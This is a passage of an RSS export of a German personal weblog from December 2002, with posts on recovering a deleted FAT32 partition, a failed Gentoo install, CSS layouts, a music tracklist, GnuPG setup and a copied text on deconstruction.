  14422. <br>Als ich es ein paar Minuten später realisierte, bin ich verständlicherweise fast vom Stuhl gefallen. Also: Computer sofort abstellen, damit die Chancen möglichst gross bleiben, ein paar Daten wiederherzustellen. Dann neu booten mit Partiton-Magic  und mit 'Wiederherstellen' herumüben. Aber das blieb ohne Erfolg, Partition-Magic wollte von der Partition nichts gesehen haben. Also nochmal Computer ausschalten. Mit dem Zweitcomputer im Internet nach 'Datenrettung fat-partition gelöscht' suchen und ein paar Seiten zum Thema finden. (<a href=""><b>Artikel zum Thema</b></a>, <a href=""><b></b></a>, <a href=""><b></b></a>). Schliesslich finde ich <a href=""><b>dieses Tool</b></a>. Nun bei meinem Computer die HDs so umhängen, dass die alte IBM-Platte bootet (hat glücklicherweise noch ein W2K drauf). Hätte nicht gedacht, dass ich die nocheinmal benutzen würde. Also, das Tool draufgetan und mit der alten Platte geboote, die zu bearbeitende als Slave angehängt. Mit dem Tool die Festplatte nach Partitionen und Ordnern und sonstigen Daten abgesucht, bit für bit nehme ich an (jedenfalls hat es so lange gedauert ;-)
  14423. <br>Zu meinem erfreulichen Erstaunen hat es sogar etwas gefunden: 36 Partitionen, von insgesamt 15 die auf der Platte sind und 4 die im durchsuchten Bereich liegen. Beim anschauen der gefundenen Daten durfte ich feststellen, dass noch alle Daten erhalten waren. Die 36 Partitionen kamen vermutlich weil ich einen Ordner mit ISO-Images verschiedener Unix-Distributionen hatte. Nun begann ich die Daten auf die alte Festplatte zu speichern, wozu ich dort fast alle Programme löschen musste, um Platz zu schaffen *g*
  14424. <br>Nachdem diese langwierige Prozedur abgeschlossen war Rechner herunterfahren. Die HDs wieder neu umhängen, so das wieder meine Platte am Master
  14425. hängt. Mit der Gentoo-Live-CD booten und mittels cfdisk die Partition neu erstellen und den Typ wieder auf Fat32 setzen. Neu booten und erfreut feststellen, dass der MBR mit einem GRUB gefüllt ist, das noch nicht vollständig installiert ist, da ich ja die Linuxinstallation abgebrochen habe. Also erneutes Suchen im Web. Beim SUSE-SUpport wurde ich schliesslich fündig: W2K-Installations-Disk einlegen und neu booten, dann R für reparieren und dann K für Wiederherstellungskonsole, W2K-Partition auswählen und Admin-Passwort eingeben. Dann mittels fixmbr den MBR wiederherstellen und mit exit neu booten. Windows aufstarten lassen. Einloggen. Arbeitsplatz öffnen, um die geretteten Dateien von der alten HD zurückzukopieren. Zu meine grossen Erstaunen, finde ist die neu erstellte Partition schon so beschriftet, wie die alte war! Ein Doppelklick darauf bringt erstaunlicherwese den Inhalt der alten Partition zum Vorschein, es ist alles noch da! Windows hat also gar nicht bemerkt, dass die Partition eigentlich neu ist und hat einfach die alten Daten zugeordnet! So habe ich dann das zurückkopieren der geretteten Daten bleiben lassen. Den Computer heruntergefahren und die alte HD wieder ausgebaut. Noch ein letzter Start von Windows, alle Daten sind noch da, und dann ab ins Bett, um <u>7 Uhr Morgens !!!</u>
  14426. <br><br>Wenn ihr also mal eine Nacht nicht schlafen wollt, könnt ihr ja eure $HOME-Partition löschen, da bleibt die Spannung bis zum Schluss erhalten, garantiert! ;-)
  14427. ]]></content:encoded>
  14428.  </item>
  14430.  <item>
  14431.    <title>CSS</title>
  14432.    <link></link>
  14433.    <guid isPermaLink="true"></guid>
  14434.    <dc:creator>Andreas Jaggi</dc:creator>
  14435.    <creativeCommons:license></creativeCommons:license>
  14436.    <pubDate>Fri, 27 Dec 2002 13:48:00 +0100</pubDate>
  14437.    <category domain="">Webdesign</category>
  14438.    <description><![CDATA[<a href=""><b>Hier</b></a> hat es unter anderem einige Beispiellayouts, tabellenlos versteht sich.<br><a href=""><b>Hier</b></a> hat es einige Links zu tabellenlosen Seiten und zu CSS-Tutorials.<br><a href=""><b>Hier</b></a>  hat es Links zu 900 tabellenlosen Websites.
  14439. ]]></description>
  14440.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> hat es unter anderem einige Beispiellayouts, tabellenlos versteht sich.<br><a href=""><b>Hier</b></a> hat es einige Links zu tabellenlosen Seiten und zu CSS-Tutorials.<br><a href=""><b>Hier</b></a>  hat es Links zu 900 tabellenlosen Websites.
  14441. ]]></content:encoded>
  14442.  </item>
  14444.  <item>
  14445.    <title>Bonnes Fêtes!</title>
  14446.    <link></link>
  14447.    <guid isPermaLink="true"></guid>
  14448.    <dc:creator>Andreas Jaggi</dc:creator>
  14449.    <creativeCommons:license></creativeCommons:license>
  14450.    <pubDate>Tue, 24 Dec 2002 16:51:01 +0100</pubDate>
  14451.    <category domain="">Misc</category>
  14452.    <description><![CDATA[Bonnes Fêtes!
  14453. ]]></description>
  14454.    <content:encoded><![CDATA[Bonnes Fêtes!
  14455. ]]></content:encoded>
  14456.  </item>
  14458.  <item>
  14459.    <title>Fröhliche Weihnachten</title>
  14460.    <link></link>
  14461.    <guid isPermaLink="true"></guid>
  14462.    <dc:creator>Andreas Jaggi</dc:creator>
  14463.    <creativeCommons:license></creativeCommons:license>
  14464.    <pubDate>Tue, 24 Dec 2002 16:51:00 +0100</pubDate>
  14465.    <category domain="">Misc</category>
  14466.    <description><![CDATA[Fröhliche Weihnachten
  14467. ]]></description>
  14468.    <content:encoded><![CDATA[Fröhliche Weihnachten
  14469. ]]></content:encoded>
  14470.  </item>
  14472.  <item>
  14473.    <title>Mist</title>
  14474.    <link></link>
  14475.    <guid isPermaLink="true"></guid>
  14476.    <dc:creator>Andreas Jaggi</dc:creator>
  14477.    <creativeCommons:license></creativeCommons:license>
  14478.    <pubDate>Mon, 23 Dec 2002 15:39:00 +0100</pubDate>
  14479.    <category domain="">Linux</category>
  14480.    <description><![CDATA[Eigentlich sollte hier eine Meldung über die erfolgreiche Installation von <a href=""><b>Gentoo</b></a> stehen, aber irgendetwas ist da wohl schief gelaufen, denn ich kann Gentoo zwar ohne Probleme starten, aber wenn ich z.b. <span style="font-family: monospace;">emerge sync</span> eingebe, erscheint ein Fehler, dass die URL nicht aufgelöst werden konnte und auch wenn ich <span style="font-family: monospace;">ping</span> oder so eingebe, erscheint die Fehlermeldung; folglich muss ich wohl die ganze Installation noch einmal machen :-(
  14481. ]]></description>
  14482.    <content:encoded><![CDATA[Eigentlich sollte hier eine Meldung über die erfolgreiche Installation von <a href=""><b>Gentoo</b></a> stehen, aber irgendetwas ist da wohl schief gelaufen, denn ich kann Gentoo zwar ohne Probleme starten, aber wenn ich z.b. <span style="font-family: monospace;">emerge sync</span> eingebe, erscheint ein Fehler, dass die URL nicht aufgelöst werden konnte und auch wenn ich <span style="font-family: monospace;">ping</span> oder so eingebe, erscheint die Fehlermeldung; folglich muss ich wohl die ganze Installation noch einmal machen :-(
  14483. ]]></content:encoded>
  14484.  </item>
  14486.  <item>
  14487.    <title>Ferien</title>
  14488.    <link></link>
  14489.    <guid isPermaLink="true"></guid>
  14490.    <dc:creator>Andreas Jaggi</dc:creator>
  14491.    <creativeCommons:license></creativeCommons:license>
  14492.    <pubDate>Sat, 21 Dec 2002 11:56:00 +0100</pubDate>
  14493.    <category domain="">Linux</category>
  14494.    <description><![CDATA[So, die Schule in diesem Jahr haben wir auch überlebt, sogar der Absturz gestern Abend war nicht so schlimm ausgefallen (durfte einfach im Zug die Augen nicht schliessen, weil's mich sonst vornüber geworfen hätte, weil alles so gedreht hat *g*). Einen Screenshot für die Sammlung von <a href=""><b>sec</b></a>, <a href=""><b>rw</b></a> und <a href=""><b>mk</b></a> gibt's wenn ich <a href=""><b>Gentoo</b></a> neu installiert habe ...
  14495. ]]></description>
  14496.    <content:encoded><![CDATA[So, die Schule in diesem Jahr haben wir auch überlebt, sogar der Absturz gestern Abend war nicht so schlimm ausgefallen (durfte einfach im Zug die Augen nicht schliessen, weil's mich sonst vornüber geworfen hätte, weil alles so gedreht hat *g*). Einen Screenshot für die Sammlung von <a href=""><b>sec</b></a>, <a href=""><b>rw</b></a> und <a href=""><b>mk</b></a> gibt's wenn ich <a href=""><b>Gentoo</b></a> neu installiert habe ...
  14497. ]]></content:encoded>
  14498.  </item>
  14500.  <item>
  14501.    <title>Geldmacherei</title>
  14502.    <link></link>
  14503.    <guid isPermaLink="true"></guid>
  14504.    <dc:creator>Andreas Jaggi</dc:creator>
  14505.    <creativeCommons:license></creativeCommons:license>
  14506.    <pubDate>Mon, 16 Dec 2002 22:44:00 +0100</pubDate>
  14507.    <category domain="">Misc</category>
  14508.    <description><![CDATA[Im neuen <a href=""><b>c't</b></a> hat es einen Artikel über die neue 64-bit-CPU von AMD und im neuen <a href=""><b>iX</b></a> ist eine Artikel über die neue 64-bit-CPU von Intel.<br>Wenn ich nun die beiden Prozessoren vergleichen will, muss ich nun beide Magazine kaufen?<br>Verdammte Kapitalisten!
  14509. ]]></description>
  14510.    <content:encoded><![CDATA[Im neuen <a href=""><b>c't</b></a> hat es einen Artikel über die neue 64-bit-CPU von AMD und im neuen <a href=""><b>iX</b></a> ist eine Artikel über die neue 64-bit-CPU von Intel.<br>Wenn ich nun die beiden Prozessoren vergleichen will, muss ich nun beide Magazine kaufen?<br>Verdammte Kapitalisten!
  14511. ]]></content:encoded>
  14512.  </item>
  14514.  <item>
  14515.    <title>Winter</title>
  14516.    <link></link>
  14517.    <guid isPermaLink="true"></guid>
  14518.    <dc:creator>Andreas Jaggi</dc:creator>
  14519.    <creativeCommons:license></creativeCommons:license>
  14520.    <pubDate>Sun, 15 Dec 2002 04:26:00 +0100</pubDate>
  14521.    <category domain="">Webdesign</category>
  14522.    <description><![CDATA[Passend zur Jahreszeit ist jetzt <b>plain 2</b> das neue Standard-Layout.
  14523. ]]></description>
  14524.    <content:encoded><![CDATA[Passend zur Jahreszeit ist jetzt <b>plain 2</b> das neue Standard-Layout.
  14525. ]]></content:encoded>
  14526.  </item>
  14528.  <item>
  14529.    <title>Winterswap</title>
  14530.    <link></link>
  14531.    <guid isPermaLink="true"></guid>
  14532.    <dc:creator>Andreas Jaggi</dc:creator>
  14533.    <creativeCommons:license></creativeCommons:license>
  14534.    <pubDate>Sat, 14 Dec 2002 00:00:00 +0100</pubDate>
  14535.    <category domain="">Misc</category>
  14536.    <description><![CDATA[Noch die Tracklist von meiner <a href=""><b>Winterswap</b></a>-Disc:<br><br>1. <a href=""><b>Manu Chao</b></a> - Denia<br>2. In-Grid - Tu Es Foutu<br>3. <a href=""><b>Nerina Pallot</b></a> - Patience<br>4. <a href=""><b>Mylène Farmer</b></a> - Piste 1<br>5. <a href=""><b>Kate Ryan</b></a> - Désenchantée<br>6. <a href=""><b>Le Hammond Inferno</b></a> - An Apple A Day<br>7. <a href=""><b>The Verve</b></a> - Bitter Sweet Symphony<br>8. <a href=""><b>Tété</b></a> -  L'abominable Hyde<br>9. <a href=""><b>Louise Attaque</b></a> - Léa<br>10. <a href=""><b>Manau</b></a> - La Tribu De Dana<br>11. <a href=""><b>Noir Désir</b></a> - Son style 1<br>12. <a href=""><b>Noir Désir</b></a> - Comme Elle Vient<br>13. <a href=""><b>Noir Désir</b></a> - En Route pour la Joie<br>14. <a href=""><b>Noir Désir</b></a> - Johnny Colère<br>15. <a href=""><b>Noir Désir</b></a> - It Spurts<br>16. <a href=""><b>Noir Désir</b></a> - Lost<br>17. <a href=""><b>Noir Désir</b></a> - Fin de Siècle<br>18. <a href=""><b>Ska-P</b></a> - Legalisation<br>19. <a href=""><b>Attaque 77</b></a> - Que vas<br>20. <a href=""><b>Anonymus </b></a>- Virtually Insane
  14537. ]]></description>
  14538.    <content:encoded><![CDATA[Noch die Tracklist von meiner <a href=""><b>Winterswap</b></a>-Disc:<br><br>1. <a href=""><b>Manu Chao</b></a> - Denia<br>2. In-Grid - Tu Es Foutu<br>3. <a href=""><b>Nerina Pallot</b></a> - Patience<br>4. <a href=""><b>Mylène Farmer</b></a> - Piste 1<br>5. <a href=""><b>Kate Ryan</b></a> - Désenchantée<br>6. <a href=""><b>Le Hammond Inferno</b></a> - An Apple A Day<br>7. <a href=""><b>The Verve</b></a> - Bitter Sweet Symphony<br>8. <a href=""><b>Tété</b></a> -  L'abominable Hyde<br>9. <a href=""><b>Louise Attaque</b></a> - Léa<br>10. <a href=""><b>Manau</b></a> - La Tribu De Dana<br>11. <a href=""><b>Noir Désir</b></a> - Son style 1<br>12. <a href=""><b>Noir Désir</b></a> - Comme Elle Vient<br>13. <a href=""><b>Noir Désir</b></a> - En Route pour la Joie<br>14. <a href=""><b>Noir Désir</b></a> - Johnny Colère<br>15. <a href=""><b>Noir Désir</b></a> - It Spurts<br>16. <a href=""><b>Noir Désir</b></a> - Lost<br>17. <a href=""><b>Noir Désir</b></a> - Fin de Siècle<br>18. <a href=""><b>Ska-P</b></a> - Legalisation<br>19. <a href=""><b>Attaque 77</b></a> - Que vas<br>20. <a href=""><b>Anonymus </b></a>- Virtually Insane
  14539. ]]></content:encoded>
  14540.  </item>
  14542.  <item>
  14543.    <title>Enigmail - GnuPP</title>
  14544.    <link></link>
  14545.    <guid isPermaLink="true"></guid>
  14546.    <dc:creator>Andreas Jaggi</dc:creator>
  14547.    <creativeCommons:license></creativeCommons:license>
  14548.    <pubDate>Thu, 12 Dec 2002 20:37:00 +0100</pubDate>
  14549.    <category domain="">Misc</category>
  14550.    <description><![CDATA[So, nun kann auch ich sicher kommunizieren ;-)<br>Mit <a href=""><b>Enigmail</b></a> und <a href=""><b>GnuPP</b></a>.<br><br>Public Key ist <a href=""><b>hier</b></a>
  14551. ]]></description>
  14552.    <content:encoded><![CDATA[So, nun kann auch ich sicher kommunizieren ;-)<br>Mit <a href=""><b>Enigmail</b></a> und <a href=""><b>GnuPP</b></a>.<br><br>Public Key ist <a href=""><b>hier</b></a>
  14553. ]]></content:encoded>
  14554.  </item>
  14556.  <item>
  14557.    <title>Adventskalender</title>
  14558.    <link></link>
  14559.    <guid isPermaLink="true"></guid>
  14560.    <dc:creator>Andreas Jaggi</dc:creator>
  14561.    <creativeCommons:license></creativeCommons:license>
  14562.    <pubDate>Thu, 12 Dec 2002 18:31:00 +0100</pubDate>
  14563.    <category domain="">Misc</category>
  14564.    <description><![CDATA[<a href=";AT=17"><b>Hier</b></a> kann man bis zum 24. Dezember insgesamt 8 Bücher gratis herunterladen. ABer jedes Buch nur für eine beschränkte Zeit, fleissiges vorbeischauen lohnt sich!
  14565. ]]></description>
  14566.    <content:encoded><![CDATA[<a href=";AT=17"><b>Hier</b></a> kann man bis zum 24. Dezember insgesamt 8 Bücher gratis herunterladen. ABer jedes Buch nur für eine beschränkte Zeit, fleissiges vorbeischauen lohnt sich!
  14567. ]]></content:encoded>
  14568.  </item>
  14570.  <item>
  14571.    <title>Geschafft!</title>
  14572.    <link></link>
  14573.    <guid isPermaLink="true"></guid>
  14574.    <dc:creator>Andreas Jaggi</dc:creator>
  14575.    <creativeCommons:license></creativeCommons:license>
  14576.    <pubDate>Thu, 12 Dec 2002 08:40:00 +0100</pubDate>
  14577.    <category domain="">Misc</category>
  14578.    <description><![CDATA[So, nun liegt <a href=""><b></b></a> bei <a href=""><b></b></a> und nicht mehr bei dem anderen Server. Nun beginnt eine Zeit, in der man für sein Geld auch einen entsprechenden Service <b>ohne Ausfälle</b> bekommt ;-)
  14579. ]]></description>
  14580.    <content:encoded><![CDATA[So, nun liegt <a href=""><b></b></a> bei <a href=""><b></b></a> und nicht mehr bei dem anderen Server. Nun beginnt eine Zeit, in der man für sein Geld auch einen entsprechenden Service <b>ohne Ausfälle</b> bekommt ;-)
  14581. ]]></content:encoded>
  14582.  </item>
  14584.  <item>
  14585.    <title>HTML 2.0</title>
  14586.    <link></link>
  14587.    <guid isPermaLink="true"></guid>
  14588.    <dc:creator>Andreas Jaggi</dc:creator>
  14589.    <creativeCommons:license></creativeCommons:license>
  14590.    <pubDate>Sun, 08 Dec 2002 14:01:00 +0100</pubDate>
  14591.    <category domain="">Webdesign</category>
  14592.    <description><![CDATA[So aus lauter Freude hat's jetzt ein HTML 2.0 konformes Layout gegeben ;-)
  14593. ]]></description>
  14594.    <content:encoded><![CDATA[So aus lauter Freude hat's jetzt ein HTML 2.0 konformes Layout gegeben ;-)
  14595. ]]></content:encoded>
  14596.  </item>
  14598.  <item>
  14599.    <title>Inhotus</title>
  14600.    <link></link>
  14601.    <guid isPermaLink="true"></guid>
  14602.    <dc:creator>Andreas Jaggi</dc:creator>
  14603.    <creativeCommons:license></creativeCommons:license>
  14604.    <pubDate>Sat, 07 Dec 2002 20:16:00 +0100</pubDate>
  14605.    <category domain="">Misc</category>
  14606.    <description><![CDATA[<a href="#" class="gone"><b>Inhotus</b></a> ist ein Systemmonitor für Windows ähnlich wie GKrellM unter Linux.<br><br>Gefunden auf <a href=""><b></b></a>
  14607. ]]></description>
  14608.    <content:encoded><![CDATA[<a href="#" class="gone"><b>Inhotus</b></a> ist ein Systemmonitor für Windows ähnlich wie GKrellM unter Linux.<br><br>Gefunden auf <a href=""><b></b></a>
  14609. ]]></content:encoded>
  14610.  </item>
  14612.  <item>
  14613.    <title>Design</title>
  14614.    <link></link>
  14615.    <guid isPermaLink="true"></guid>
  14616.    <dc:creator>Andreas Jaggi</dc:creator>
  14617.    <creativeCommons:license></creativeCommons:license>
  14618.    <pubDate>Sat, 07 Dec 2002 19:12:00 +0100</pubDate>
  14619.    <category domain="">Webdesign</category>
  14620.    <description><![CDATA[Maintenant vous pouvez changer le layout de mon weblog au réglage<br><br><a href=""><b>phrenologik</b></a> est une site à tendance "dark"
  14621. ]]></description>
  14622.    <content:encoded><![CDATA[Maintenant vous pouvez changer le layout de mon weblog au réglage<br><br><a href=""><b>phrenologik</b></a> est une site à tendance "dark"
  14623. ]]></content:encoded>
  14624.  </item>
  14626.  <item>
  14627.    <title>Neues Design</title>
  14628.    <link></link>
  14629.    <guid isPermaLink="true"></guid>
  14630.    <dc:creator>Andreas Jaggi</dc:creator>
  14631.    <creativeCommons:license></creativeCommons:license>
  14632.    <pubDate>Sat, 07 Dec 2002 18:52:00 +0100</pubDate>
  14633.    <category domain="">Webdesign</category>
  14634.    <description><![CDATA[Da auch <a href=""><b>mk</b></a> und <a href=""><b>chee</b></a> ihrem Weblog ein neues Aussehen geschenkt haben, musste ich die schon länger geplante Erweiterung meines PHP-Irrgartens, den Layout-Switcher, endlich fertig machen. Bei den Einstellungen könnt ihr nun euer Lieblingsdesign auswählen. Vorerst ist zwar nur das Standardlayout plain und das besonders kreative txt verfügbar - später werden's mehr sein ;-)
  14635. ]]></description>
  14636.    <content:encoded><![CDATA[Da auch <a href=""><b>mk</b></a> und <a href=""><b>chee</b></a> ihrem Weblog ein neues Aussehen geschenkt haben, musste ich die schon länger geplante Erweiterung meines PHP-Irrgartens, den Layout-Switcher, endlich fertig machen. Bei den Einstellungen könnt ihr nun euer Lieblingsdesign auswählen. Vorerst ist zwar nur das Standardlayout plain und das besonders kreative txt verfügbar - später werden's mehr sein ;-)
  14637. ]]></content:encoded>
  14638.  </item>
  14640.  <item>
  14641.    <title>Dekonstruktohastenichgesehn</title>
  14642.    <link></link>
  14643.    <guid isPermaLink="true"></guid>
  14644.    <dc:creator>Andreas Jaggi</dc:creator>
  14645.    <creativeCommons:license></creativeCommons:license>
  14646.    <pubDate>Fri, 06 Dec 2002 18:18:00 +0100</pubDate>
  14647.    <category domain="">Misc</category>
  14648.    <description><![CDATA[Kann mir das jemand erklären?<br>von (wer ist das?) erhalten<br><br>Dekonstruktion (dt.) dient als Schlagwort für eine ganze Reihe von Strömungen in
  14649. Philosophie, Architektur, Kunst und Literatur seit den sechziger Jahren.
  14650. Deconstruction (am.) soll hier im engeren Sinne als Kennzeichen für ein Lektüre-
  14651. und Analyseverfahren von Texten stehen, das sich von hermeneutischen Theorien
  14652. [Querverweis Hermeneutik] und der Praxis der Interpretation abgrenzt.
  14653. Der Unterschied zwischen hermeneutischen und dekonstruktiven
  14654. (antihermeneutischen) Textbefragungen besteht darin, daß der hermeneutische
  14655. Ansatz von einem quasi dialogischen Verhältnis zwischen Text und Interpret
  14656. ausgehen, das auf ein zunehmend besseres Verständnis der im Text enthaltenen
  14657. Botschaft abzielt. Dadurch wird letztlich eine rekonstruierbare Sinneinheit
  14658. unterstellt wird. Dekonstruktivisten bemühen sich um das Gegenteil: sie bemühen
  14659. sich um den Nachweis, daß - und vor allem: wie - ein Text seine Bedeutung selbst
  14660. hinterfragt, durchkreuzt und gerade mit solchen Paradoxien Sinn schafft.
  14661. Dieses Nachspüren von im Text angelegten Widersprüchen wurde - unter Einfluß des
  14662. französischen Philosophen Jacques Derrida - zunächst in Nordamerika praktiziert:
  14663. Literaturwissenschaftler wie Paul de Man, J. Hillis Miller und Geoffrey Hartman
  14664. zeigen in ihren Analysen, wie die Bedeutungsebene (Textsemantik, die
  14665. Signifikate) und die materiale Ebene (die rhetorische Figuralität, die
  14666. Signifikanten gegeneinander arbeiten, indem auch über die materiale Form der
  14667. Zeichen Bedeutung transportiert wird. "Jegliche Sprache ist, wie de Man richtig
  14668. bemerkt, unausweichlich metaphorisch, arbeitet mit Tropen und Bildern, es ist
  14669. ein Fehler zu glauben, daß irgendeine Sprache buchstäblich wörtlich ist."
  14670. (Eagleton, S. 131) In literarischen Texten jedoch tritt die Unentscheidbarkeit
  14671. zwischen 'wortwörtlichen'und figuralen Lesarten deutlicher hervor als in
  14672. anderen.<br>
  14673. Als Wortneuschöpfung vereint der Begriff Dekonstruktion sowohl Sinnkonstruktion
  14674. als auch Sinndestruktion. Auch eine dekonstruktive Lektüre kann nicht auf eine
  14675. vorhergehende hermeneutische Interpretation verzichten. Üblicherweise wird dafür
  14676. zunächst eine semantische bzw. referentielle Lesart vorgeschlagen, deren
  14677. Vereinfachungstendenz in einer zweiten, die rhetorische Ebene des Textes
  14678. betonenden Lesart aufgezeigt wird.<br>
  14679. Daraus ergeben sich verschiedene literaturtheoretische Einsichten: Literatur ist
  14680. der Ort, an dem sich die Utopie der sprachlichen Referenz auf eine der Sprache
  14681. präexistierenden Wirklichkeit zugleich mit der Einsicht in ihre Unmöglichkeit
  14682. zeigt: "Von der Antike bis zu den Versuchen der Avantgarde ist die Literatur
  14683. bemüht, etwas darzustellen. Was? Ich sage ganz hart: das Wirkliche. Das
  14684. Wirkliche ist nicht darstellbar [...] Mit dem Umstand, daß es keine
  14685. Übereinstimmung zwischen dem Wirklichen und der Rede gibt, können die Menschen
  14686. sich nicht abfinden, und diese Weigerung, die vielleicht so alt ist wie die Rede
  14687. selbst, bringt in einem unablässigen Bemühen Literatur hervor. Man könnte sich
  14688. eine Geschichte der Literatur vorstellen [...], die die Geschichte der - oft
  14689. ganz aberwitzigen - verbalen Notbehelfe wäre, die die Menschen benutzt haben, um
  14690. das zu reduzieren, zu zähmen, zu leugnen oder auch das auf sich zu nehmen, was
  14691. immer ein Delirium ist, nämlich die fundamentale Nicht-Adäquatheit von Rede und
  14692. Wirklichem." (S. 32ff.)<br>
  14693. Weiterhin scheint es typisch für dekonstruktive Lesarten zu sein, binäre
  14694. Oppositionen wie Buchstäblichkeit / Bildhaftigkeit, Wissenschaft / Literatur,
  14695. Objektsprache / Metasprache, innen / außen, männlich / weiblich, Geist / Körper,
  14696. Kultur / Natur, Subjekt / Objekt, Signifikat / Signifikant etc. außer Kraft zu
  14697. setzen, weil sie nachweisen, daß bestimmte Regelmäßigkeiten, die einen der
  14698. beiden Begriffe und damit die unterscheidende Grenze zum anderen Begriff
  14699. kennzeichnen, gleichermaßen für den anderen gelten. Darin enthalten ist eine
  14700. fundamentale Ideologie- und Kulturkritik, weil solche binären Oppositionen das
  14701. Denken und die Wahrnehmung nicht nur als Vorstellung einer unüberbrückbaren
  14702. Differenz zwischen den beiden Einheiten prägen, sondern weil zumeist einer der
  14703. beiden Begriffe eine höhere Geltung erlangt als der andere. Dekonstruktion
  14704. erklärt diese Opposition nicht nur für ungültig: Gezeigt wird auch, daß in - oft
  14705. kanonischen - Texten Widerstände gegen diese Vereinheitlichung des Sinns
  14706. eingeschrieben sind. Dekonstruktive Lektüren sind daher mittlerweile
  14707. selbstverständlicher Bestandteil in den verschiedensten literatur- und
  14708. kulturwissenschaftlichen Disziplinen geworden (v.a. Postkolonialismus,
  14709. Feministische Literaturtheorie, Psychoanalytische Literaturwissenschaft.
  14710. ]]></description>
  14711.    <content:encoded><![CDATA[Kann mir das jemand erklären?<br>von (wer ist das?) erhalten<br><br>Dekonstruktion (dt.) dient als Schlagwort für eine ganze Reihe von Strömungen in
  14712. Philosophie, Architektur, Kunst und Literatur seit den sechziger Jahren.
  14713. Deconstruction (am.) soll hier im engeren Sinne als Kennzeichen für ein Lektüre-
  14714. und Analyseverfahren von Texten stehen, das sich von hermeneutischen Theorien
  14715. [Querverweis Hermeneutik] und der Praxis der Interpretation abgrenzt.
  14716. Der Unterschied zwischen hermeneutischen und dekonstruktiven
  14717. (antihermeneutischen) Textbefragungen besteht darin, daß der hermeneutische
  14718. Ansatz von einem quasi dialogischen Verhältnis zwischen Text und Interpret
  14719. ausgehen, das auf ein zunehmend besseres Verständnis der im Text enthaltenen
  14720. Botschaft abzielt. Dadurch wird letztlich eine rekonstruierbare Sinneinheit
  14721. unterstellt wird. Dekonstruktivisten bemühen sich um das Gegenteil: sie bemühen
  14722. sich um den Nachweis, daß - und vor allem: wie - ein Text seine Bedeutung selbst
  14723. hinterfragt, durchkreuzt und gerade mit solchen Paradoxien Sinn schafft.
  14724. Dieses Nachspüren von im Text angelegten Widersprüchen wurde - unter Einfluß des
  14725. französischen Philosophen Jacques Derrida - zunächst in Nordamerika praktiziert:
  14726. Literaturwissenschaftler wie Paul de Man, J. Hillis Miller und Geoffrey Hartman
  14727. zeigen in ihren Analysen, wie die Bedeutungsebene (Textsemantik, die
  14728. Signifikate) und die materiale Ebene (die rhetorische Figuralität, die
  14729. Signifikanten gegeneinander arbeiten, indem auch über die materiale Form der
  14730. Zeichen Bedeutung transportiert wird. "Jegliche Sprache ist, wie de Man richtig
  14731. bemerkt, unausweichlich metaphorisch, arbeitet mit Tropen und Bildern, es ist
  14732. ein Fehler zu glauben, daß irgendeine Sprache buchstäblich wörtlich ist."
  14733. (Eagleton, S. 131) In literarischen Texten jedoch tritt die Unentscheidbarkeit
  14734. zwischen 'wortwörtlichen'und figuralen Lesarten deutlicher hervor als in
  14735. anderen.<br>
  14736. Als Wortneuschöpfung vereint der Begriff Dekonstruktion sowohl Sinnkonstruktion
  14737. als auch Sinndestruktion. Auch eine dekonstruktive Lektüre kann nicht auf eine
  14738. vorhergehende hermeneutische Interpretation verzichten. Üblicherweise wird dafür
  14739. zunächst eine semantische bzw. referentielle Lesart vorgeschlagen, deren
  14740. Vereinfachungstendenz in einer zweiten, die rhetorische Ebene des Textes
  14741. betonenden Lesart aufgezeigt wird.<br>
  14742. Daraus ergeben sich verschiedene literaturtheoretische Einsichten: Literatur ist
  14743. der Ort, an dem sich die Utopie der sprachlichen Referenz auf eine der Sprache
  14744. präexistierenden Wirklichkeit zugleich mit der Einsicht in ihre Unmöglichkeit
  14745. zeigt: "Von der Antike bis zu den Versuchen der Avantgarde ist die Literatur
  14746. bemüht, etwas darzustellen. Was? Ich sage ganz hart: das Wirkliche. Das
  14747. Wirkliche ist nicht darstellbar [...] Mit dem Umstand, daß es keine
  14748. Übereinstimmung zwischen dem Wirklichen und der Rede gibt, können die Menschen
  14749. sich nicht abfinden, und diese Weigerung, die vielleicht so alt ist wie die Rede
  14750. selbst, bringt in einem unablässigen Bemühen Literatur hervor. Man könnte sich
  14751. eine Geschichte der Literatur vorstellen [...], die die Geschichte der - oft
  14752. ganz aberwitzigen - verbalen Notbehelfe wäre, die die Menschen benutzt haben, um
  14753. das zu reduzieren, zu zähmen, zu leugnen oder auch das auf sich zu nehmen, was
  14754. immer ein Delirium ist, nämlich die fundamentale Nicht-Adäquatheit von Rede und
  14755. Wirklichem." (S. 32ff.)<br>
  14756. Weiterhin scheint es typisch für dekonstruktive Lesarten zu sein, binäre
  14757. Oppositionen wie Buchstäblichkeit / Bildhaftigkeit, Wissenschaft / Literatur,
  14758. Objektsprache / Metasprache, innen / außen, männlich / weiblich, Geist / Körper,
  14759. Kultur / Natur, Subjekt / Objekt, Signifikat / Signifikant etc. außer Kraft zu
  14760. setzen, weil sie nachweisen, daß bestimmte Regelmäßigkeiten, die einen der
  14761. beiden Begriffe und damit die unterscheidende Grenze zum anderen Begriff
  14762. kennzeichnen, gleichermaßen für den anderen gelten. Darin enthalten ist eine
  14763. fundamentale Ideologie- und Kulturkritik, weil solche binären Oppositionen das
  14764. Denken und die Wahrnehmung nicht nur als Vorstellung einer unüberbrückbaren
  14765. Differenz zwischen den beiden Einheiten prägen, sondern weil zumeist einer der
  14766. beiden Begriffe eine höhere Geltung erlangt als der andere. Dekonstruktion
  14767. erklärt diese Opposition nicht nur für ungültig: Gezeigt wird auch, daß in - oft
  14768. kanonischen - Texten Widerstände gegen diese Vereinheitlichung des Sinns
  14769. eingeschrieben sind. Dekonstruktive Lektüren sind daher mittlerweile
  14770. selbstverständlicher Bestandteil in den verschiedensten literatur- und
  14771. kulturwissenschaftlichen Disziplinen geworden (v.a. Postkolonialismus,
  14772. Feministische Literaturtheorie, Psychoanalytische Literaturwissenschaft.
  14773. ]]></content:encoded>
  14774.  </item>
  14776.  <item>
  14777.    <title>GIMP-Tutorials</title>
  14778.    <link></link>
  14779.    <guid isPermaLink="true"></guid>
  14780.    <dc:creator>Andreas Jaggi</dc:creator>
  14781.    <creativeCommons:license></creativeCommons:license>
  14782.    <pubDate>Thu, 05 Dec 2002 13:25:00 +0100</pubDate>
  14783.    <category domain="">Webdesign</category>
